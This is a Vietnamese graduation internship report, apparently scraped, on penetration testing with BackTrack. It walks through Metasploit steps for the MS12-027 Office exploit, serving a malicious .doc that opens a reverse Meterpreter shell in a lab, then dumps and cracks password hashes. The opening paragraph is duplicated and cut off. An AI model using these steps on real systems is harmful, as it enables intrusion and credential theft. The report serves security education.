Mạng Quốc tế ATHENA. Trong quá trình thực hiện, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận được ý kiến đóng góp Thầy, Cô để em học thêm được nhiều kinh nghiệm và sẽ hoàn thành tốt hơn những bài báo cáo sau. Em xin chân thành cảm ơn sâu sắc nhất Trong thời đại “phẳng” như ngày nay, vai trò của Công nghệ Thông tin (CNTT) và Internet ngày càng vô cùng quan trọng. Điều này kéo theo phần lớn các ngành kinh tế phụ thuộc vào máy vi tính. Chính vì vậy, nhiều ý đồ phá hoại đã nhắm vào hệ thống này, và cũng không loại trừ khả năng đối thủ cạnh tranh nhau, do đó để bảo đảm máyMạng Quốc tế ATHENA. Trong quá trình thực hiện, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận được ý kiến đóng góp Thầy, Cô để em học thêm được nhiều kinh nghiệm và sẽ hoàn thành tốt hơn những bài báo cáo sau. Em xin chân thành cảm ơn sâu sắc nhất Trong thời đại “phẳng” như ngày nay, vai trò của Công nghệ Thông tin (CNTT) và Internet ngày càng vô cùng quan trọng. Điều này kéo theo phần lớn các ngành kinh tế phụ thuộc vào máy vi tính. Chính vì vậy, nhiều ý đồ phá hoại đã nhắm vào hệ thống này, và cũng không loại trừ khả năng đối thủ cạnh tranh nhau, do đó để bảo đảm máy tính hoạt động trơn tru, liên tục đòi hỏiMạng Quốc tế ATHENA. Trong quá trình thực hiện, cũng như là trong quá trình làm bài báo cáo, khó tránh khỏi sai sót, rất mong các Thầy bỏ qua. Đồng thời kinh nghiệm thực tiễn còn hạn chế nên bài báo cáo không thể tránh khỏi những thiếu sót, em rất mong nhận được ý kiến đóng góp Thầy, Cô để em học thêm được nhiều kinh nghiệm và sẽ hoàn thành tốt hơn những bài báo cáo sau. Em xin chân thành cảm ơn sâu sắc nhất Trong thời đại “phẳng” như ngày nay, vai trò của Công nghệ Thông tin (CNTT) và Internet ngày càng vô cùng quan trọng. Điều này kéo theo phần lớn các ngành kinh tế phụ thuộc vào máy vi tính. Chính vì vậy, nhiều ý đồ phá hoại đã nhắm vào hệ thống này, và cũng không loại trừ khả năng đối thủ cạnh tranh nhau, do đó để bảo đảm máy tính hoạt động trơn tru, liên tục đòi hỏi tính hoạt động trơn tru, liên tục đòi hỏi
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA oOo BÁO CÁO THỰC TẬP TỐT NGHIỆP Đề tài: Nghiên cứu sử dụng chức BackTrack để kiểm tra an ninh mạng Sinh viên thực hiện: Võ Hoàng Huy Giáo viên hướng dẫn: Võ Đỗ Thắng TP HỒ CHÍ MINH, Ngày 14 Tháng 05 Năm 2015 NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TPHCM, ngày 14 tháng năm 2015 Giảng Viên Hướng Dẫn NHẬN XÉT CỦA CÔNG TY THỰC TẬP TPHCM, ngày 14 tháng năm Giáo Viên Cơng Ty Thực Tập 2015 LỜI NĨI ĐẦU Em xin gởi lời cảm ơn chân thành tri ân sâu sắc thầy cô trường Đại học Công Nghiệp TP.HCM, đặc biệt thầy ngành quản trị mạng website trường tạo điều kiện cho em thực đồ án Và em xin chân thành cám ơn thầy Võ Đỗ Thắng nhiệt tình hướng dẫn hướng dẫn em hồn thành tốt báo cáo thực tập tốt nghiệp Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc tế ATHENA Trong trình thực hiện, q trình làm báo cáo, khó tránh khỏi sai sót, mong Thầy bỏ qua Đồng thời kinh nghiệm thực tiễn hạn chế nên báo cáo khơng thể tránh khỏi thiếu sót, em mong nhận ý kiến đóng góp Thầy, Cơ để em học thêm nhiều kinh nghiệm hoàn thành tốt báo cáo sau Em xin chân thành cảm ơn sâu sắc ! Trong thời đại “phẳng” ngày nay, vai trò Cơng nghệ Thông tin (CNTT) Internet ngày vô quan trọng Điều kéo theo phần lớn ngành kinh tế phụ thuộc vào máy vi tính Chính vậy, nhiều ý đồ phá hoại nhắm vào hệ thống này, không loại trừ khả đối thủ cạnh tranh nhau, để bảo đảm máy tính hoạt động trơn tru, liên tục đòi hỏi hệ thống phải trang bị công cụ, biện pháp phòng thủ, hệ thống cảnh báo, bảo mật cao nhằm chống lại tin tặc (hacker) Chúng ta biết hacker có loại, hacker mũ đen hacker mũ trắng Hacker mũ đen tay tinh quái thông minh vô cùng, họ không giỏi khả lập trình mà giỏi mạng, giao thức mạng, họ lợi dụng lỗi nhỏ từ khai thác cơng hệ thống máy chủ, gây thiệt hại lớn doanh nghiệp lớn, tập đoàn lớn, hay ngân hàng Thật nguy hiểm tồn thơng tin tài khoản ngân hàng khách hàng loạt vào tay hacker, dự án, kế hoạch tập đoàn hay doanh nghiệp Quả thật thiệt hại hacker gây lớn ảnh hưởng nghiêm trọng đến người dùng máy tính Vì nhằm chống lại hacker mũ đen, hacker mũ trắng không ngừng nâng cao kiến thức nhạy bén, cẩn thận, tư sáng tạo không ngừng nhằm ngăn chặn, bảo vệ người dùng máy tính, tạo nơi người dùng tin cậy thông tin, tài khoản, kế hoạch, dự án họ hoàn toàn bảo mật an tồn tuyệt đối Do vai trò an ninh mạng thật thiết thực giống đất nước khơng có lực lượng cơng an, cảnh sát, quân đội hậu mà người dân phải gánh chịu thật nghiêm trọng, chắn đất nước khơng phát triển kịp theo thời đại kỹ thuật số Nội dung báo cáo gồm chương Chương 1: Giới thiệu khái quát đơn vị thực tập, trình hình thành phát triển hoạt động doanh doanh nghiệp Chương 2: Tồn nội dung đề tài thực tập Chương 3: Nhận xét kết luận, so sánh trình tìm hiểu thực tiễn với lý thuyết học LỜI CẢM ƠN KHOA CÔNG NGHỆ THÔNG TIN TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP TPHCM Em xin chân thành cảm ơn trường Đại Học Công Nghiệp TPHCM khoa Công Nghệ Thông Tin tạo điều kiện cho em hoàn thành tốt đợt Thực Tập Trong đợt thực tập cho em kinh nghiệm quý báu Những kinh nghiệm giúp em hồn thiện cơng việc mơi trường làm việc sau Mặc dù em cố gắng hoàn thành báo cáo thực tập với tất nổ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Em mong nhận đóng góp, chia sẻ để em làm tốt Một lần em xin chân thành cảm ơn TPHCM, ngày 14 tháng 05 năm 2015 Sinh viên thực tập Võ Hồng Huy Hình ảnh thầy Võ Đỗ Thắng trung tâm tin học Athena MỤC LỤC CHƯƠNG 1: GIỚI THIỆU KHÁI QUÁT VỀ ĐƠN VỊ THỰC TẬP 1.1 Giới thiệu công ty 1.2 Lịch sử hình thành 1.3 Quá trình phát triển 10 1.4 Chức nhiệm vụ 11 1.5 Lĩnh vực hoạt động kinh doanh 11 1.6 Cơ cấu tổ chức 12 CHƯƠNG 2: THỰC TẬP KỸ NĂNG – NGHỀ NGHIỆP 13 2.1 Tổng quan an ninh mạng 13 2.2 BackTrack 14 2.2.1 Giới thiệu 14 2.2.2 Lịch sử phát triển 14 2.2.3 Mục đích 15 2.2.4 Nguồn tải 16 2.2.5 Cài đặt máy thật 16 2.2.6 Cài đặt máy ảo 16 2.3 Footprinting 24 2.3.1 Footprinting gì? 24 2.3.2 Các kiểu Footprinting 26 2.3.2.1 Passive Footprinting 26 2.3.2.2 Active Footprinting 31 2.4 Scanning 31 2.4.1 Scanning gì? 31 2.4.2 Các công cụ tiện ích 32 2.4.3 Quá trình thực Scanning 32 2.5 Enumeration 43 2.5.1 Enumeration gì? 43 2.5.2 Telnet gì? 44 2.5.3 Netcat gì? 44 2.5.4 Open SSL 45 2.5.5 DNS Enumeration 46 2.6 System hacking 48 2.6.1 Giới thiệu 48 2.6.2 Lỗi MS12_020 49 2.6.2.1 Giới thiệu 49 2.6.2.2 Q trình cơng 49 2.6.2.3 Cách khắc phục 52 2.6.3 Lỗi MS08_067 52 2.6.3.1 Giới thiệu 52 2.6.3.2 Q trình cơng 53 2.6.3.3 Cách khắc phục 60 2.6.4 Lỗi MS12_027 60 2.6.4.1 Giới thiệu 60 2.6.4.2 Q trình cơng 60 2.6.4.3 Cách khắc phục 70 2.7 Password Cracking 71 2.7.1 Giới thiệu 71 2.7.2 Passive Online Attracks 71 2.7.3 Active Online Attracks 72 2.7.4 Offline Attracks 72 2.7.5 Demo crack password 72 CHƯƠNG 3: NHẬN XÉT – KẾT LUẬN 75 3.1 Ưu điểm 75 3.2 Khuyết điểm 75 3.3 Kết luận 75 CHƯƠNG 1: GIỚI THIỆU KHÁI QUÁT VỀ ĐƠN VỊ THỰC TẬP 1.1 Giới thiệu công ty Trung Tâm Đào Tạo Mạng Quản Trị Mạng Quốc Tế ATHENA tiền thân Công ty TNHH Tư vấn Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt TRUNG TÂM ĐÀO TẠO ATHENA), thức thành lập theo giấy phép kinh doanh số 4104006757 Sở Kế Hoạch Và Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008 Tên công ty viết tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED 1.2 Lịch sử hình thành Năm 2000, nhóm thành viên doanh nhân tài thành công lĩnh vực công nghệ thông tin nhận tiềm phát triển việc đào tạo công nghệ thông tin nước nhà Họ cá nhân có trình độ chun mơn cao có đầu óc lãnh đạo với tầm nhìn tương lai ngành công nghệ thông tin, họ quy tụ lực lượng lớn đội ngũ công nghệ thông tin trước hết làm nhiệm vụ ứng cứu máy tính cho doanh nghiệp, cá nhân có nhu cầu Bước phát triển vươn tầm đào tạo đội ngũ cán công nghệ thông tin cho đất nước xã hội Các thành viên sáng lập bao gồm: Ơng Nguyễn Thế Đơng: Cựu giám đốc trung tâm ứng cứu Athena, giám đốc dự án cơng ty Siemen Telecom Ơng Hứa Văn Thế Phúc: Phó Giám Đốc Phát triển Thương Mại Cơng ty EIS, Phó Tổng Cơng ty FPT Ơng Nghiêm Sỹ Thắng: Phó Tổng Giám Đốc Ngân hàng Liên Việt, chịu trách nhiệm cơng nghệ thơng tin ngân hàng Ơng Võ Đỗ Thắng: Giám Đốc Trung tâm đào tạo quản trị an ninh mạng Athena Tiếp tục gõ lệnh use exploit/windows/fileformat/ms12_027_mscomctl_bol Tiếp tục gõ lệnh show options 62 Gõ lệnh set filename windows7-key.doc Gõ lệnh set LHOST 192.168.19.128 (IP máy backtrack) 63 Gõ tiếp lệnh exploit, máy backtrack tạo file windows7-key.doc Ta gõ lệnh cp /root/.msf4/local/windows7-key.doc /root/Desktop để copy file windows7-key.doc hình máy backtrack 64 Ta copy file windows7-key.doc vào đường dẫn Place\Home Folder\ Device\File System\var\www Ta mở hình command line backtrack gõ lệnh /etc/inet.d/apache2 start để khởi động web server 65 Tại hình command line cũ máy backtrack ta tiếp tục gõ lệnh use exploit/multi/handler Tiếp tục gõ lệnh set payload windows/meterpreter/reverse_tcp 66 Tiếp tục gõ lệnh set LHOST 192.168.19.128 (IP máy backtrack) Ta gõ lệnh exploit 67 Lúc ta khởi động máy backtrack làm listen host (máy lắng nghe), máy XP mở file windows7-key.doc lên máy XP bị công Tại máy XP, ta download file windows7-key.doc mở lên Ta bật trình duyệt web lên gõ 192.168.19.128/windows7-key.doc, xuất thông báo download file ta chọn ok Chạy file windows7-key.doc máy backtrack báo có session opened ta gõ lệnh sysinfo ta thấy thông tin máy nạn nhân (máy XP) 68 Ta gõ lệnh getuid để chiếm quyền admin Và đến ta có tồn quyền định sống hệ thống Ta thử tạo folder tên successfull lệnh md successful 69 Ta quay lại máy XP thấy có folder tên successful Desktop 2.6.4.3 Cách khắc phục Ta vào trang web Microsoft cập nhật vá lỗi cho công cụ Office tương ứng với phiên 70 2.7 Password Cracking 2.7.1 Giới thiệu Cracking Password q trình bẻ khóa mật mà hacker mong muốn thực q trình cơng Nếu bẻ khóa thành cơng thơng tin, tài khoản người dùng thật nguy hiểm Có bốn kiểu crack password: Passive Online: Nghe trôm thay đổi mật mạng Cuộc công thụ động trực tuyến bao gồm: sniffing, man-in-the-middle, replay attacks (tấn công dựa vào phản hồi) Active Online: Đoán trước mật nguời quản trị Các công trực tuyến bao gồm việc đốn password tự động Offline: Các kiểu cơng Dictionary, hybrid, brute-force Non-Electronic: Các công dựa vào yếu tố người Social engineering, Phising… 2.7.2 Passive Online Attracks Một công thụ động trực tuyến đánh (sniffing) để tìm dấu vết, mật mạng Mật bị bắt (capture) q trình xác thực sau so sánh với từ điển (dictionary) danh sách từ (word list) Tài khoản người dùng có mật thường băm (hashed) mã hóa 71 (encrypted) trước gửi lên mạng để ngăn chặn truy cập trái phép sử dụng Nếu mật bảo vệ cách trên,một số công cụ đặc biệt giúp hacker phá vỡ thuật tốn mã hóa mật 2.7.3 Active Online Attracks Cách dễ để đạt cấp độ truy cập quản trị viên hệ thống phải đoán từ đơn giản thông qua giả định quản trị viên sử dụng mật đơn giản Mật đốn để cơng Active Online Attack dựa yếu tố người tham gia vào việc tạo mật cách công hữu dụng với mật yếu Khi thảo luận giai đoạn Enumeration, bạn học lỗ hổng NetBIOS Enumeration Null Session Giả sử NetBIOS TCP mở port 139, phương pháp hiệu để đột nhập vào Win NT hệ thống Windows 2000 đoán mật Cái thực cách cố gắng kết nối đến hệ thống giống quản trị viên thực Tài khoản mật kết hợp để đăng nhập vào hệ thống 2.7.4 Offline Attracks Cuộc công Offline thực vị trí khác hành động máy tính có chứa mật nơi mật sử dụng Cuộc công Offline yêu cầu phần cứng để truy cập vật lý vào máy tính chép tập tin mật từ hệ thống lên phương tiện di động Hacker sau có file tiếp tục khai thác lỗ hổng bảo mật Bảng sau minh họa vài loại hình công offline: 2.7.5 Demo crack password 72 Tại máy backtrack, sau chiếm quyền admin lệnh getuid tiếp tục gõ lệnh hashdump toàn user password khai thác Password mã hóa dạng hash Truy cập trang web http://www.hash-cracker.com/ Ta copy dãy số hash vào khung bên dưới, sau điền mã Capcha vào click nút crack kết 73 Và số password khơng tìm thấy Do độ dài phức tạp password 74 CHƯƠNG 3: NHẬN XÉT – KẾT LUẬN 3.1 Ưu điểm Đề tài an ninh mạng giúp cho em hiểu trình cơng, cần phải làm gì, phải chuẩn bị thu thập thông tin từ đâu Sau q trình cơng vào hệ thống máy tính nạn nhân Từ biết cách thức trình hacker làm gì, qua biết cách phòng thủ triển khai hệ thống an ninh mạng giúp cho hệ thơng ta an tồn trước cơng 3.2 Khuyết điểm Trong q trình, q trình cracking password em chưa hồn thành tốt có password dài phức tạp chí khơng tìm đòi hỏi kỹ thuật crack cao 3.3 Kết Luận Trong trình nghiên cứu đề tài an ninh mạng em nhận thấy lĩnh vực đa dạng phong phú thật quan trọng, đặc biệt vấn đề cho hệ thống máy tính hoạt động trơn tru, tránh đe dọa công hacker Nó khơng gây nguy hại đến người dùng mà đặc biệt doanh nghiệp, tập đồn, ngân hàng, tài Q trình tìm hiểu nghiên cứu Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc tế ATHENA vỏn vẹn hai tháng, nhiều kiến thức khác liên quan em nhận thấy cần phải tiếp tục nỗ lực nữa, đề tài an ninh mạng thật lôi hấp dẫn em Kiến thức thực tiễn đa dạng phong phú so với em học nghiên cứu, em nỗ lực cố gắng mong ước em trở thành chuyên gia an ninh mạng cao cấp 75 PHỤ LỤC Giới thiệu thân đề tài đăng ký thực tập Link: Báo cáo kết thực tập, khó khăn, thuận lợi kinh nghiệm rút từ tập Link: Khai thác công thông qua mã lỗi ms08_067 Link: https://www.youtube.com/watch?v=DLLNE-zyhJE Khai thác công thông qua mã lỗi ms12_020 Link: https://www.youtube.com/watch?v=bwXSpnf-76k Khai thác công thông qua mã lỗi ms12_027 Link: https://www.youtube.com/watch?v=5H_72wVz-Z0 76 ... vùng để cài đặt Backtrack Sau chạy Backtrack Live DVD Khi gặp hình login Ta sử dụng username root, pass toor Sau để vào chế độ đồ họa, ta gõ startx ta vào chế độ đồ họa Backtrack Để cài đặt Backtrack. .. BackTrack máy ảo VMWare Tạo máy ảo đưa đĩa BackTrack vào 17 Giao diện khởi động Backtrack Chọn Default Boot Text Mode 18 Gõ startx để vào chế độ đồ họa Backtrack Click vào Install BackTrack để. .. NGHIỆP 2.1 Tổng quan an ninh mạng An ninh mạng vấn đề nóng thời gian gần Theo ơng Ngơ Tuấn Anh, Phó Chủ tịch phụ trách an ninh mạng thuộc Công ty Bkav, từ ngày 8/5 đến 11/5, có 220 trang web Việt